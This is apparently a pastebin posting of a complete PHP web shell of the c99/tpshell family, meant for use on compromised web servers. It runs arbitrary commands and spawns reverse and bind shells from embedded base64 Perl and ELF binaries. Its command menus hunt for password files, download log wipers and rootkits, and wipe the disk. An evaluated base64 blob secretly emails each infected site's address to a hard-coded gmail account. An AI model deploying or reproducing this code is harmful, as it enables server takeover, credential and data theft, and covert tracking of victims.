· 5 years ago · Feb 29, 2020, 02:30 PM
1<?php
2if (!function_exists('myshellexec'))
3{
4if(is_callable('popen')){
5function myshellexec($command) {
6if (!($p=popen("($command)2>&1",'r'))) {
7return 126;
8}
9while (!feof($p)) {
10$line=fgets($p,1000);
11$out .= $line;
12}
13pclose($p);
14return $out;
15}
16}else{
17function myshellexec($cmd)
18{
19global $disablefunc;
20$result = '';
21if (!empty($cmd))
22{
23if (is_callable('exec') and !in_array('exec',$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
24elseif (($result = `$cmd`) !== FALSE) {}
25elseif (is_callable('system') and !in_array('system',$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
26elseif (is_callable('passthru') and !in_array('passthru',$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
27elseif (is_resource($fp = popen($cmd,'r')))
28{
29$result = '';
30while(!feof($fp)) {$result .= fread($fp,1024);}
31pclose($fp);
32}
33}
34return $result;
35}
36}
37}
38$sh_name = sh_name();
39
40
41$curdir = "./";
42$tmpdir = "";
43$tmpdir_logs = "./";
44$log_email = "email@email.com";
45$sess_cookie = "cookie1";
46$sort_default = "0a";
47$sort_save = TRUE;
48$usefsbuff = TRUE;
49$copy_unset = FALSE;
50$surl_autofill_include = TRUE;
51$updatenow = FALSE;
52$gzipencode = TRUE;
53$filestealth = TRUE;
54$hexdump_lines = 8;
55$hexdump_rows = 24;
56$millink = milw0rm();
57$win = strtolower(substr(PHP_OS,0,3)) == "win";
58$disablefunc = getdisfunc();
59error_reporting(E_ERROR | E_PARSE);
60@ini_set("max_execution_time",0);
61@set_time_limit(0); #No Fx in SafeMode
62@ignore_user_abort(TRUE);
63@set_magic_quotes_runtime(0);
64define("starttime",getmicrotime());
65if (get_magic_quotes_gpc()) { strips($GLOBALS); }
66$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
67@$f = $_REQUEST["f"];
68@extract($_REQUEST["tpshcook"]);
69foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } }
70
71
72if ($surl_autofill_include) {
73$include = "&";
74foreach (explode("&",getenv("QUERY_STRING")) as $v) {
75$v = explode("=",$v);
76$name = urldecode($v[0]);
77$value = @urldecode($v[1]);
78foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
79if (strpos($value,$needle) === 0) {
80$includestr .= urlencode($name)."=".urlencode($value)."&";
81}
82}
83}
84}
85#BC_
86if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
87{
88$ip = gethostbyname($_SERVER["HTTP_HOST"]);
89$por = $_POST['backconnectport'];
90if(is_writable(".")){
91cfb("shbd",$backdoor);
92chmod('shbd', 0777);
93$cmd = "./shbd $por";
94exec("$cmd > /dev/null &");
95$scan = myshellexec("ps aux");
96if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
97$_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
98}else{
99cfb("/tmp/shbd",$backdoor);
100chmod('/tmp/shbd', 0777);
101$cmd = "./tmp/shbd $por";
102exec("$cmd > /dev/null &");
103$scan = myshellexec("ps aux");
104if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
105$_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
106}
107}
108
109if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
110{
111if(is_writable(".")){
112cf("back",$back_connect);
113$p2=which("perl");
114$blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
115$_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
116if (file_exists("back")) { unlink("back"); }
117}else{
118cf("/tmp/back",$back_connect);
119$p2=which("perl");
120$blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
121$_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
122if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
123}
124}
125
126if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
127{
128if(is_writable(".")){
129cf("backc",$back_connect_c);
130chmod('backc', 0777);
131//$blah = ex("gcc back.c -o backc");
132$blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
133$_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
134//if (file_exists("back.c")) { unlink("back.c"); }
135if (file_exists("backc")) { unlink("backc"); }
136}else{
137chmod('/tmp/backc', 0777);
138cf("/tmp/backc",$back_connect_c);
139//$blah = ex("gcc -o /tmp/backc /tmp/back.c");
140$blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
141$_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
142//if (file_exists("back.c")) { unlink("back.c"); }
143if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
144}
145
146function cf($fname,$text)
147{
148$w_file=@fopen($fname,"w") or err();
149if($w_file)
150{
151@fputs($w_file,@base64_decode($text));
152@fclose($w_file);
153}
154}
155
156function cfb($fname,$text)
157{
158$w_file=@fopen($fname,"w") or bberr();
159if($w_file)
160{
161@fputs($w_file,@base64_decode($text));
162@fclose($w_file);
163}
164}
165
166function err()
167{
168$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
169}
170
171function bberr()
172{
173$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
174}
175
176
177function ex($cfe)
178{
179$res = '';
180if (!empty($cfe))
181{
182if(function_exists('exec'))
183{
184@exec($cfe,$res);
185$res = join("\n",$res);
186}
187elseif(function_exists('shell_exec'))
188{
189$res = @shell_exec($cfe);
190}
191elseif(function_exists('system'))
192{
193@ob_start();
194@system($cfe);
195$res = @ob_get_contents();
196@ob_end_clean();
197}
198elseif(function_exists('passthru'))
199{
200@ob_start();
201@passthru($cfe);
202$res = @ob_get_contents();
203@ob_end_clean();
204}
205elseif(@is_resource($f = @popen($cfe,"r")))
206{
207$res = "";
208while(!@feof($f)) { $res .= @fread($f,1024); }
209@pclose($f);
210}
211}
212return $res;
213}
214function CleanDir($d)
215{
216$d=str_replace("\\","/",$d);
217$d=str_replace("//","/",$d);
218return $d;
219}
220//EoW
221if (empty($surl)) {
222$surl = "?".$includestr;
223$surl = htmlspecialchars($surl);
224}
225$ftypes = array(
226"html" => array("html","htm","shtml"),
227"txt" => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
228"exe" => array("sh","install","bat","cmd"),
229"ini" => array("ini","inf","conf"),
230"code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
231"img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
232"sdb" => array("sdb"),
233"phpsess" => array("sess"),
234"download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar")
235);
236$exeftypes = array(
237getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
238"perl %f%" => array("pl","cgi")
239);
240$regxp_highlight = array(
241array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
242array("\.tgz$",1,"<font color=#C082FF>","</font>"),
243array("\.gz$",1,"<font color=#C082FF>","</font>"),
244array("\.tar$",1,"<font color=#C082FF>","</font>"),
245array("\.bz2$",1,"<font color=#C082FF>","</font>"),
246array("\.zip$",1,"<font color=#C082FF>","</font>"),
247array("\.rar$",1,"<font color=#C082FF>","</font>"),
248array("\.php$",1,"<font color=#00FF00>","</font>"),
249array("\.php3$",1,"<font color=#00FF00>","</font>"),
250array("\.php4$",1,"<font color=#00FF00>","</font>"),
251array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
252array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
253array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
254array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
255array("\.ico$",1,"<font color=#00FFFF>","</font>"),
256array("\.gif$",1,"<font color=#00FFFF>","</font>"),
257array("\.png$",1,"<font color=#00FFFF>","</font>"),
258array("\.htm$",1,"<font color=#00CCFF>","</font>"),
259array("\.html$",1,"<font color=#00CCFF>","</font>"),
260array("\.txt$",1,"<font color=#C0C0C0>","</font>")
261);
262if (!$win) {
263$cmdaliases = array(
264array("", "ls -al"),
265array("Find all suid files", "find / -type f -perm -04000 -ls"),
266array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
267array("Find all sgid files", "find / -type f -perm -02000 -ls"),
268array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
269array("Find config.inc.php files", "find / -type f -name config.inc.php"),
270array("Find config* files", "find / -type f -name \"config*\""),
271array("Find config* files in current dir", "find . -type f -name \"config*\""),
272array("Find all writable folders and files", "find / -perm -2 -ls"),
273array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
274array("Find all writable folders", "find / -type d -perm -2 -ls"),
275array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
276array("Find all service.pwd files", "find / -type f -name service.pwd"),
277array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
278array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
279array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
280array("Find all .bash_history files", "find / -type f -name .bash_history"),
281array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
282array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
283array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
284array("List file attributes on a Linux second extended file system", "lsattr -va"),
285array("Show opened ports", "netstat -an | grep -i listen")
286);
287$cmdaliases2 = array(
288array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tgz;tar -zxf fx.tgz"),
289array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tgz;tar -zxf fxb.tgz"),
290array("-----",""),
291array("Logged in users","w"),
292array("Last to connect","lastlog"),
293array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
294array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
295array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
296array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
297array("CPU Info","cat /proc/version /proc/cpuinfo"),
298array("Is gcc installed ?","locate gcc"),
299array("Format box (DANGEROUS)","rm -Rf"),
300array("-----",""),
301array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
302array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
303array("Run WIPELOGS PT3","./zap2"),
304array("-----",""),
305array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
306array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
307array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
308);
309}
310else {
311$cmdaliases = array(
312array("", "dir"),
313array("Find index.php in current dir", "dir /s /w /b index.php"),
314array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
315array("Find c99shell in current dir", "find /c \"c99\" *"),
316array("Find r57shell in current dir", "find /c \"r57\" *"),
317array("Find tpshell in current dir", "find /c \"tp\" *"),
318array("Show active connections", "netstat -an"),
319array("Show running services", "net start"),
320array("User accounts", "net user"),
321array("Show computers", "net view"),
322);
323}
324if ($act == "tools") { tools(); }
325$phpfsaliases = array(
326array("Read File", "read", 1, "File", ""),
327array("Write File (PHP5)", "write", 2, "File","Text"),
328array("Copy", "copy", 2, "From", "To"),
329array("Rename/Move", "rename", 2, "File", "To"),
330array("Delete", "delete", 1 ,"File", ""),
331array("Make Dir","mkdir", 1, "Dir", ""),
332array("Download", "download", 2, "URL", "To"),
333array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
334array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
335array("Find Writable Dir", "fwritabledir", 2 ,"Dir"),
336array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
337);
338
339$quicklaunch1 = array(
340array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" border=\"0\">",$surl),
341array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" border=\"0\">","#\" onclick=\"history.back(1)"),
342array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" border=\"0\">","#\" onclick=\"history.go(1)"),
343array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
344array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" border=\"0\">",$surl."act=search&d=%d"),
345array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" border=\"0\">",$surl."act=fsbuff&d=%d")
346);
347$quicklaunch2 = array(
348array("[ System Info ]",$surl."act=security&d=%d"),
349array("[ Processes ]",$surl."act=processes&d=%d"),
350array("[ SQL Manager ]",$surl."act=sql&d=%d"),
351array("[ Eval ]",$surl."act=eval&d=%d"),
352array("[ Encoder ]",$surl."act=encoder&d=%d"),
353array("[ Mailer ]",$surl."act=mler"),
354array("[ Back Connection ]",$surl."act=backc"),
355array("[ Backdoor Server ]",$surl."act=backd"),
356array("[ Kernel Exploit Search ]",$millink),
357array("[ MD5 Decrypter ]",$surl."act=dec"),
358array("[ Reverse IP ]",$surl."act=rev"),
359array("[ Kill Shell ]",$surl."act=selfremove"),
360);
361if (!$win) {
362$quicklaunch2[] = array("<br>[ FTP Brute-Force ]",$surl."act=ftpquickbrute&d=%d");
363}
364
365$highlight_background = "#C0C0C0";
366$highlight_bg = "#FFFFFF";
367$highlight_comment = "#6A6A6A";
368$highlight_default = "#0000BB";
369$highlight_html = "#1300FF";
370$highlight_keyword = "#007700";
371$highlight_string = "#000000";
372
373$fxbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkZ4MjlTaGVsbCBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvcjxicj4iOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJnaW1taWV5b3Vyc2hlbGxzQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5KTsgfQ0KfQ0KZWxzZSB7ICR2aXNpdGMrKzsgfQ0KQHNldGNvb2tpZSgidmlzaXR6IiwkdmlzaXRjKTs=";
374eval(base64_decode($fxbuff));
375
376
377
378if ($act != "img") {
379$lastdir = realpath(".");
380chdir($curdir);
381
382if ($sort_save) {
383if (!empty($sort)) {setcookie("sort",$sort);}
384if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
385}
386if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
387if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
388if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
389if (!function_exists("mysql_dump")) {
390function mysql_dump($set) {
391global $sh_ver;
392$sock = $set["sock"];
393$db = $set["db"];
394$print = $set["print"];
395$nl2br = $set["nl2br"];
396$file = $set["file"];
397$add_drop = $set["add_drop"];
398$tabs = $set["tabs"];
399$onlytabs = $set["onlytabs"];
400$ret = array();
401$ret["err"] = array();
402if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
403if (empty($db)) {$db = "db";}
404if (empty($print)) {$print = 0;}
405if (empty($nl2br)) {$nl2br = 0;}
406if (empty($add_drop)) {$add_drop = TRUE;}
407if (empty($file)) {
408$file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
409}
410if (!is_array($tabs)) {$tabs = array();}
411if (empty($add_drop)) {$add_drop = TRUE;}
412if (sizeof($tabs) == 0) {
413//Retrieve tables-list
414$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
415if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
416}
417$out = "
418# Dumped by ".$sh_name."
419#
420# Host settings:
421# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
422# Date: ".date("d.m.Y H:i:s")."
423# DB: \"".$db."\"
424#---------------------------------------------------------";
425$c = count($onlytabs);
426foreach($tabs as $tab) {
427if ((in_array($tab,$onlytabs)) or (!$c)) {
428if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
429//Receieve query for create table structure
430$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
431if (!$res) {$ret["err"][] = mysql_smarterror();}
432else {
433$row = mysql_fetch_row($res);
434$out .= $row["1"].";\n\n";
435//Receieve table variables
436$res = mysql_query("SELECT * FROM `$tab`", $sock);
437if (mysql_num_rows($res) > 0) {
438while ($row = mysql_fetch_assoc($res)) {
439$keys = implode("`, `", array_keys($row));
440$values = array_values($row);
441foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
442$values = implode("', '", $values);
443$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
444$out .= $sql;
445}
446}
447}
448}
449}
450$out .= "#---------------------------------------------------------------------------------\n\n";
451if ($file) {
452$fp = fopen($file, "w");
453if (!$fp) {$ret["err"][] = 2;}
454else {
455fwrite ($fp, $out);
456fclose ($fp);
457}
458}
459if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
460return $out;
461}
462}
463if (!function_exists("mysql_buildwhere")) {
464function mysql_buildwhere($array,$sep=" and",$functs=array()) {
465if (!is_array($array)) {$array = array();}
466$result = "";
467foreach($array as $k=>$v) {
468$value = "";
469if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
470$value .= "'".addslashes($v)."'";
471if (!empty($functs[$k])) {$value .= ")";}
472$result .= "`".$k."` = ".$value.$sep;
473}
474$result = substr($result,0,strlen($result)-strlen($sep));
475return $result;
476}
477}
478if (!function_exists("mysql_fetch_all")) {
479function mysql_fetch_all($query,$sock) {
480if ($sock) {$result = mysql_query($query,$sock);}
481else {$result = mysql_query($query);}
482$array = array();
483while ($row = mysql_fetch_array($result)) {$array[] = $row;}
484mysql_free_result($result);
485return $array;
486}
487}
488if (!function_exists("mysql_smarterror")) {
489function mysql_smarterror($type,$sock) {
490if ($sock) {$error = mysql_error($sock);}
491else {$error = mysql_error();}
492$error = htmlspecialchars($error);
493return $error;
494}
495}
496if (!function_exists("mysql_query_form")) {
497function mysql_query_form() {
498global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
499if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
500if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
501if ((!$submit) or ($sql_act)) {
502echo "<table border=0><tr><td><form name=\"tpsh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
503if ($tbl_struct) {
504echo "<td valign=\"top\"><b>Fields:</b><br>";
505foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.tpsh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
506echo "</td></tr></table>";
507}
508}
509if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
510}
511}
512if (!function_exists("mysql_create_db")) {
513function mysql_create_db($db,$sock="") {
514$sql = "CREATE DATABASE `".addslashes($db)."`;";
515if ($sock) {return mysql_query($sql,$sock);}
516else {return mysql_query($sql);}
517}
518}
519if (!function_exists("mysql_query_parse")) {
520function mysql_query_parse($query) {
521$query = trim($query);
522$arr = explode (" ",$query);
523$types = array(
524"SELECT"=>array(3,1),
525"SHOW"=>array(2,1),
526"DELETE"=>array(1),
527"DROP"=>array(1)
528);
529$result = array();
530$op = strtoupper($arr[0]);
531if (is_array($types[$op])) {
532$result["propertions"] = $types[$op];
533$result["query"] = $query;
534if ($types[$op] == 2) {
535foreach($arr as $k=>$v) {
536if (strtoupper($v) == "LIMIT") {
537$result["limit"] = $arr[$k+1];
538$result["limit"] = explode(",",$result["limit"]);
539if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
540unset($arr[$k],$arr[$k+1]);
541}
542}
543}
544}
545else {return FALSE;}
546}
547}
548if ($act == "gofile") {
549if (is_dir($f)) { $act = "ls"; $d = $f; }
550else { $act = "f"; $d = dirname($f); $f = basename($f); }
551}
552
553@ob_start();
554@ob_implicit_flush(0);
555header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
556header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
557header("Cache-Control: no-store, no-cache, must-revalidate");
558header("Cache-Control: post-check=0, pre-check=0", FALSE);
559header("Pragma: no-cache");
560if (empty($tmpdir)) {
561$tmpdir = ini_get("upload_tmp_dir");
562if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
563}
564$tmpdir = realpath($tmpdir);
565$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
566if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
567if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
568else {$tmpdir_logs = realpath($tmpdir_logs);}
569$sort = htmlspecialchars($sort);
570if (empty($sort)) {$sort = $sort_default;}
571$sort[1] = strtolower($sort[1]);
572$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
573if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
574$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
575@ini_set("highlight.bg",$highlight_bg);
576@ini_set("highlight.comment",$highlight_comment);
577@ini_set("highlight.default",$highlight_default);
578@ini_set("highlight.html",$highlight_html);
579@ini_set("highlight.keyword",$highlight_keyword);
580@ini_set("highlight.string",$highlight_string);
581if (!is_array($actbox)) { $actbox = array(); }
582$dspact = $act = htmlspecialchars($act);
583$disp_fullpath = $ls_arr = $notls = null;
584$ud = @urlencode($d);
585if (empty($d)) {$d = realpath(".");}
586elseif(realpath($d)) {$d = realpath($d);}
587$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
588if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
589$d = str_replace("\\\\","\\",$d);
590$dispd = htmlspecialchars($d);
591$back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+DxBCJRcyD7AiLRQyDwASD7AT/MOgI/v//g8QIicOLRQyDwAiD7AT/MOjz/f//g8QIjQQDQFCLRQyDwAT/MOgu/v//g8QQg+wEagZqAWoC6G3+//+DxBCJReSD7ARqEI1FyFD/deToRv7//4PEEIXAeRqD7AxoCYkECOhy/f//g8QQg+wMagDo9f3//4PsCItFDP8wjUWoUOjE/f//g8QQg+wMjUWoUOhV/f//g8QQg+wIagD/deTolf3//4PEEIPsCGoB/3Xk6IX9//+DxBCD7AhqAv915Oh1/f//g8QQg+wEagBoF4kECGgdiQQI6N78//+DxBCD7Az/deTo4Pz//4PEEI1l9FteX8nDkFWJ5VdWU4PsDOgAAAAAW4HD6hEAAOiC/P//jYMg////jZMg/